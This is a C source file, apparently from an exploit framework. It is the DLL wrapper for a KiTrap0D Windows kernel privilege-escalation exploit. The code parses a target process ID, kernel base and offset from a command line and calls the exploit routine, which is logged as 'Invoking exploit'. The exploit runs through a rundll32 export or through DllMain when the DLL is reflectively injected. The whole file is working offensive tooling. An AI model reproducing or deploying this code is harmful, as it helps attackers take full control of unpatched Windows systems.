157 lines
3.8 KiB
C
Executable File
157 lines
3.8 KiB
C
Executable File
//
|
|
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll"
|
|
// in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
|
|
// can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
|
|
// not apply to the produced x64 dll.
|
|
//
|
|
|
|
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
#include "../common/ReflectiveLoader.c"
|
|
|
|
#include <stdlib.h>
|
|
#include "kitrap0d.h"
|
|
#include "../common/common.h"
|
|
|
|
/*!
|
|
* @brief Grab a \c DWORD value out of the command line.
|
|
* @example elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
|
|
* @param cpCommandLine Command line string
|
|
* @param cpCommand The command to look for to get the associated \c int from.
|
|
* @returns The \c int value associated with the \c cpCommand.
|
|
*/
|
|
DWORD elevator_command_dword(char * cpCommandLine, char * cpCommand)
|
|
{
|
|
char * cpString = NULL;
|
|
DWORD dwResult = 0;
|
|
|
|
do
|
|
{
|
|
if (!cpCommandLine || !cpCommand) {
|
|
break;
|
|
}
|
|
|
|
cpString = strstr(cpCommandLine, cpCommand);
|
|
if (!cpString) {
|
|
break;
|
|
}
|
|
|
|
cpString += strlen(cpCommand);
|
|
|
|
dwResult = strtoul(cpString, NULL, 0);
|
|
|
|
} while (0);
|
|
|
|
return dwResult;
|
|
}
|
|
|
|
/*!
|
|
* @brief Grab an \c int value out of the command line.
|
|
* @example elevator_command_dword( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
|
|
* @param cpCommandLine Command line string
|
|
* @param cpCommand The command to look for to get the associated \c int from.
|
|
* @returns The \c int value associated with the \c cpCommand.
|
|
*/
|
|
int elevator_command_int(char * cpCommandLine, char * cpCommand)
|
|
{
|
|
char * cpString = NULL;
|
|
int iResult = 0;
|
|
|
|
do
|
|
{
|
|
if (!cpCommandLine || !cpCommand) {
|
|
break;
|
|
}
|
|
|
|
cpString = strstr(cpCommandLine, cpCommand);
|
|
if (!cpString) {
|
|
break;
|
|
}
|
|
|
|
cpString += strlen(cpCommand);
|
|
|
|
iResult = atoi(cpString);
|
|
|
|
} while (0);
|
|
|
|
return iResult;
|
|
}
|
|
|
|
/*!
|
|
* @brief The real entrypoint for this app.
|
|
* @param cpCommandLine Pointer to the command line.
|
|
*/
|
|
VOID elevator_main(char * cpCommandLine)
|
|
{
|
|
DWORD dwResult = ERROR_SUCCESS;
|
|
|
|
do
|
|
{
|
|
dprintf("[KITRAP0D] elevator_main. cpCommandLine=0x%08X", (DWORD)cpCommandLine);
|
|
|
|
if (!cpCommandLine) {
|
|
break;
|
|
}
|
|
|
|
if (strlen(cpCommandLine) == 0) {
|
|
break;
|
|
}
|
|
|
|
dprintf("[KITRAP0D] elevator_main. lpCmdLine=%s", cpCommandLine);
|
|
|
|
DWORD dwProcessId = 0;
|
|
DWORD dwKernelBase = 0;
|
|
DWORD dwOffset = 0;
|
|
|
|
dwProcessId = elevator_command_dword(cpCommandLine, "/VDM_TARGET_PID:");
|
|
dwKernelBase = elevator_command_dword(cpCommandLine, "/VDM_TARGET_KRN:");
|
|
dwOffset = elevator_command_dword(cpCommandLine, "/VDM_TARGET_OFF:");
|
|
|
|
if (!dwProcessId || !dwKernelBase) {
|
|
break;
|
|
}
|
|
|
|
dprintf("[KITRAP0D] Invoking exploit");
|
|
elevator_kitrap0d(dwProcessId, dwKernelBase, dwOffset);
|
|
|
|
// ...we should never return here...
|
|
dprintf("[KITRAP0D] This shouldn't happen");
|
|
} while (0);
|
|
}
|
|
|
|
/*!
|
|
* @brief rundll32.exe entry point.
|
|
* @todo Remove this?
|
|
*/
|
|
VOID DLLEXPORT CALLBACK a(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow)
|
|
{
|
|
elevator_main(lpszCmdLine);
|
|
|
|
ExitProcess(ERROR_SUCCESS);
|
|
}
|
|
|
|
/*!
|
|
* @brief DLL entry point.
|
|
* @remark If we have been injected via RDI, lpReserved will be our command line.
|
|
*/
|
|
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
|
|
{
|
|
BOOL bReturnValue = TRUE;
|
|
|
|
switch (dwReason)
|
|
{
|
|
case DLL_PROCESS_ATTACH:
|
|
hAppInstance = hInstance;
|
|
if (lpReserved != NULL) {
|
|
elevator_main((char *)lpReserved);
|
|
}
|
|
break;
|
|
case DLL_PROCESS_DETACH:
|
|
case DLL_THREAD_ATTACH:
|
|
case DLL_THREAD_DETACH:
|
|
break;
|
|
}
|
|
|
|
return bReturnValue;
|
|
}
|